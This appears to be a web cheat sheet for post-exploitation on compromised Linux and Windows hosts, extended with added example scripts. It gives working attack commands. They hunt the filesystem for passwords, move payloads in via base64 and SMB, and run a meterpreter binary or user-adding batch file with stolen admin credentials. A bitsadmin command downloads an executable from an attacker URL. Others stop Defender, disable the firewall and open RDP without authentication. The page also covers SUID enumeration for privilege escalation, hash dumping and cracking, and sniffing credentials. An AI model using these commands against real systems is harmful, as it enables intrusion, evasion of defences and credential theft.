
Post Exploitation

Post-exploitation is a phase after an attacker has successfully breached a system. During this stage, the focus shifts from gaining initial access to maintaining control and further exploring the compromised environment. This involves activities such as privilege escalation, lateral movement within the network, data exfiltration, and establishing persistent access. Post-exploitation techniques aim to maximize the attacker's control over the compromised system and gather valuable information without raising suspicion.

Search the whole filesystem for credential strings, printing the file name and line number of every hit. Note that -w restricts matches to whole words, so 'pass' matches a line like pass = x but not password= or passwd; drop -w to catch those as well:

grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always

File upload on Linux systems via base64 encoding

Converting a file to base64

Once the file is converted to base64, create a new file on the remote system and paste the base64 output into it (encode with -w0 so the output is one long line, which survives a paste through a reverse shell better than wrapped output). The next step is to decode it back to binary, then compare a checksum of the result with the original before running it, since a paste that was cut short can decode without complaint into a truncated file:

cat fileWithBase64Content | base64 -d > finalBinary
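The whole round trip as an added example, not code from the original page: encode on the attacker side, simulate the paste (including the two ways it goes wrong, re-wrapping and truncation), decode on the target and verify the hash before trusting the binary. The function names and the throwaway file standing in for the real binary are my assumptions; base64 -w0 and sha256sum are the GNU coreutils versions found on most Linux targets.

```shell
#!/bin/sh
# Added example, not code from the original page. Function names are assumptions;
# base64 -w0 and sha256sum are the GNU coreutils versions found on most Linux targets.

# Attacker side: one long line (-w0) pastes more reliably than wrapped output.
encode_file() {
    base64 -w0 "$1"
}

# Target side: rebuild the binary. base64 -d ignores newlines a terminal may
# have inserted while pasting, so a re-wrapped blob still decodes.
decode_file() {
    base64 -d "$1" > "$2" && chmod +x "$2"
}

# Hash only, without the file name, so two results can be compared directly.
file_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# Full round trip: encode, optionally cut the paste short after N characters
# (a flaky shell often drops the tail), simulate terminal wrapping at 76
# columns, decode, and compare checksums. Prints "ok" or "MISMATCH".
transfer_roundtrip() {
    src="$1"
    cut_at="${2:-0}"
    work=$(mktemp -d)
    encode_file "$src" > "$work/payload.b64"
    if [ "$cut_at" -gt 0 ]; then
        head -c "$cut_at" "$work/payload.b64" > "$work/cut.b64" && mv "$work/cut.b64" "$work/payload.b64"
    fi
    fold -w 76 "$work/payload.b64" > "$work/pasted.b64"   # what lands in the remote file
    decode_file "$work/pasted.b64" "$work/finalBinary"
    if [ "$(file_sha256 "$src")" = "$(file_sha256 "$work/finalBinary")" ]; then
        echo ok
    else
        echo MISMATCH
    fi
    rm -rf "$work"
}

# Stand-alone run against a constructed 3000-byte stand-in for the real binary.
if [ "${1:-}" = "demo" ]; then
    sample=$(mktemp)
    head -c 3000 /dev/urandom > "$sample"
    echo "original: $(file_sha256 "$sample")"
    transfer_roundtrip "$sample"         # ok
    transfer_roundtrip "$sample" 2000    # MISMATCH: only 1500 bytes were pasted
    rm -f "$sample"
fi
```

Run it as sh transfer.sh demo. The truncated case is the one to remember: 2000 base64 characters is a multiple of four, so base64 -d decodes it into a 1500-byte file without any error, and only the checksum comparison reveals that the binary is incomplete.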

You can also use smbserver.py from Impacket's repo to host a temporary SMB server and fetch files onto Windows hosts with net use (or copy straight from the UNC path). Many current Windows builds refuse SMB1 and unauthenticated guest access, so start the server with -smb2support and a -username/-password pair, and pass those credentials to net use.

PsExec shells on remote systems

Example: get a cmd.exe shell on a remote system as the administrator user with a known password

Powershell Sudo for Windows

There may be times when you know the admin creds but only have a low-privileged shell. Unlike Linux, Windows has no sudo; the closest equivalent, runas, only takes the password interactively, so it cannot be driven from a non-interactive shell. The following PowerShell snippet runs a file as that user and asks for elevation, so you can run a batch file that adds a new superuser or execute a meterpreter binary as admin. Run it in a PowerShell window:

$pw = ConvertTo-SecureString "EnterPasswordHere" -AsPlainText -Force
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "EnterDomainName\EnterUserName", $pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
# Double quotes so $script expands here; inside single quotes it would reach the inner PowerShell as the literal text $script, which is undefined there
Start-Process powershell -Credential $pp -ArgumentList "-NoProfile -Command Start-Process '$script' -Verb RunAs"

Start-Process -Credential runs the inner PowerShell in your session under the admin user's standard (UAC-filtered) token; the inner -Verb RunAs then asks for elevation. On a host with UAC enabled that raises a consent prompt on the interactive desktop, so from a non-interactive shell it only works silently when UAC is off or the account is exempt from filtering (the built-in Administrator by default). If you want to run the PowerShell from a cmd prompt instead, store the above commands in a xyz.ps1 file and run it from cmd as below:

powershell -ExecutionPolicy Bypass -File xyz.ps1

Download files in Windows with bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe

Disable firewall/defender and enable RDP for all

Sometimes you will have the admin creds and may require an RDP session to find out what exactly is going on in the backend for post exploitation. The commands below disable Defender and the firewall, enable RDP, and turn off Network Level Authentication so that any client can connect. Two caveats: on Windows 10 and later the Defender service is protected, so sc stop WinDefend usually returns "Access is denied" even from an elevated prompt (and Tamper Protection reverts other attempts to switch it off); and netsh firewall is the deprecated pre-Vista syntax kept here only for old hosts, while netsh advfirewall is the current one. All of this is noisy in the event log, so do it only when the RDP session is really needed.

sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Print files with the line number where the string is found

grep -rnw '/' -ie 'password' --color=always
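As an added example, not from the original page, covering both the grep commands at the top of the page and the one above: the same recursive search wrapped in shell functions with the filters a practitioner adds on a real box (skip binaries, skip /proc and friends, optionally keep only assignment-looking lines), run against a constructed directory tree so it can be exercised offline. The function names, the CRED_PATTERN regex and the sample files are my assumptions; on a real host call the functions with / as the root.

```shell
#!/bin/sh
# Added example, not from the original page. Function names, CRED_PATTERN and the
# constructed sample tree are assumptions made here; use "/" as the root on a real box.

# Keys worth hunting for. grep -w would stop 'pass' from matching 'password',
# so the variants are spelled out in the pattern instead of relying on -w.
CRED_PATTERN='pass(word|wd|phrase)?|secret|api[_-]?key|token|DB_USER'

# Recursive, case-insensitive, line-numbered search that skips binaries (-I)
# and the pseudo-filesystems that only produce noise or stall the search.
hunt_creds() {
    grep -rnIiE \
        --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=run \
        "$CRED_PATTERN" "$1" 2>/dev/null
}

# Stricter variant: only lines where the key is followed by '=' or ':', which keeps
# assignments in .env/ini/yaml files and drops most prose and documentation hits.
hunt_assignments() {
    grep -rnIiE \
        --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=run \
        "($CRED_PATTERN)[[:space:]]*[=:]" "$1" 2>/dev/null
}

# Constructed sample tree: one real secret, one prose mention, one binary with the
# string embedded, and a fake /proc entry. Prints the root so callers can clean up.
demo_cred_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/app" "$root/proc/1"
    cat > "$root/app/.env" <<'EOF'
DB_USER=app
DB_PASSWORD=S3cr3t!
DEBUG=false
EOF
    cat > "$root/app/README" <<'EOF'
Set DB_PASSWORD in .env before starting. Never pass secrets on the command line.
EOF
    printf 'ELF\000\000password=binaryjunk\000' > "$root/app/tool.bin"
    printf 'password=from-proc\n' > "$root/proc/1/environ"
    echo "$root"
}

# Stand-alone run: the broad search first, then the assignment-only view.
if [ "${1:-}" = "demo" ]; then
    root=$(demo_cred_tree)
    echo "== all hits =="; hunt_creds "$root"
    echo "== assignments only =="; hunt_assignments "$root"
    rm -rf "$root"
fi
```

Run it as sh hunt.sh demo. The broad search returns three lines (both .env assignments plus the README sentence); the assignment-only search drops the README line and keeps the two real settings. --color=always is left out on purpose because the escape codes it inserts break any further grep or cut over the output; add it only for interactive use.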

Find files with SUID permission

find / -perm -4000 -type f 2>/dev/null

Find files with fully open permissions (rwxrwxrwx; -perm -777 requires every bit, so a 0666 file is not matched)

find / -perm -777 -type f 2>/dev/null

Find SUID files owned by the current user, and SUID files owned by root (the root-owned ones are the escalation candidates)

find / -perm /u=s -user $(whoami) 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

Find files owned by the current user with owner- or group-write set (-perm / means any of the listed bits; -perm - would require all of them). find's -writable test checks real access for the current process instead of mode bits, which also covers group membership and ACLs.

find / -perm /u=w -user $(whoami) 2>/dev/null
find / -perm /u+w,g+w -type f -user $(whoami) 2>/dev/null

Find directories owned by the current user with owner- or group-write set

find / -perm /u=w -type d -user $(whoami) 2>/dev/null
find / -perm /u+w,g+w -type d -user $(whoami) 2>/dev/null
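As an added example, not from the original page: the find expressions above wrapped in shell functions that take a root directory, plus a -writable variant that asks the kernel for real access instead of reading mode bits, run against a constructed tree with one file per category. It also makes the difference between -perm - (all listed bits must be set) and -perm / (any listed bit) visible. Function names and the tree are my assumptions; on a real box pass / as the root.

```shell
#!/bin/sh
# Added example, not from the original page. Function names and the constructed
# tree are assumptions; on a real box call each function with "/" as the root.

# Setuid files: "-perm -4000" means the 4000 bit must be set, whatever else is.
find_suid() { find "$1" -perm -4000 -type f 2>/dev/null | sort; }

# Root-owned setuid files, the ones that matter for privilege escalation.
find_root_suid() { find "$1" -user root -perm -4000 -type f 2>/dev/null | sort; }

# Fully open files: every bit set (rwxrwxrwx). A 0666 file is missed by this test.
find_mode_777() { find "$1" -perm -777 -type f 2>/dev/null | sort; }

# World-writable files: the bit that actually matters, regardless of the others.
find_world_writable() { find "$1" -perm -o+w -type f 2>/dev/null | sort; }

# Files we own with owner- or group-write set. "-perm /" means ANY of the listed bits.
find_owner_writable() { find "$1" -perm /u+w,g+w -type f -user "$(id -un)" 2>/dev/null | sort; }

# Same test for directories (a writable dir on PATH or under cron is a foothold).
find_owner_writable_dirs() { find "$1" -perm /u+w,g+w -type d -user "$(id -un)" 2>/dev/null | sort; }

# -writable asks the kernel whether *this* process may write, so it also catches
# group membership and ACLs that mode-bit tests miss (and everything, if you are root).
find_writable() { find "$1" -writable -type f 2>/dev/null | sort; }

# Constructed tree with one entry per category. Prints the root for cleanup.
demo_perm_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/drop" "$root/locked"
    printf 'x' > "$root/bin/suid_tool";  chmod 4755 "$root/bin/suid_tool"
    printf 'x' > "$root/bin/readonly";   chmod 444  "$root/bin/readonly"
    printf 'x' > "$root/drop/open.sh";   chmod 777  "$root/drop/open.sh"
    printf 'x' > "$root/drop/world.txt"; chmod 646  "$root/drop/world.txt"
    chmod 755 "$root/bin" "$root/drop"
    chmod 555 "$root/locked"             # the one directory we cannot write to
    echo "$root"
}

# Stand-alone run: list every category against the constructed tree.
if [ "${1:-}" = "demo" ]; then
    root=$(demo_perm_tree)
    for fn in find_suid find_root_suid find_mode_777 find_world_writable \
              find_owner_writable find_owner_writable_dirs find_writable; do
        echo "== $fn =="; "$fn" "$root"
    done
    rm -rf "$root"
fi
```

Run it as sh enum.sh demo. On the constructed tree the setuid test returns only bin/suid_tool, -perm -777 returns only drop/open.sh (world.txt at 0646 is world-writable but not fully open, so it shows up under the -o+w test instead), and the owner-writable test for files counts three because suid_tool at 4755 carries u+w too. find_root_suid is deliberately not asserted on: its answer depends on whether you ran the script as root.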

In order to move laterally on the network we need to know as much about the machine as possible. We need to loot it. These are things that should be done on every compromised machine:

  • tcpdump: capture traffic on the box to see what it talks to and whether any credentials cross the wire in clear text.

  • Who else is connected to the machine? (who, w and last on Linux; query user on Windows)

  • Dump the hashes. It is always good to have a list of all the hashes and crack them; maybe someone is reusing a password.

  • To what is the machine connected?

      • netstat

      • ipconfig (ip addr on Linux), plus arp -a for recently seen neighbours

  • Email and personal files

  • Logs
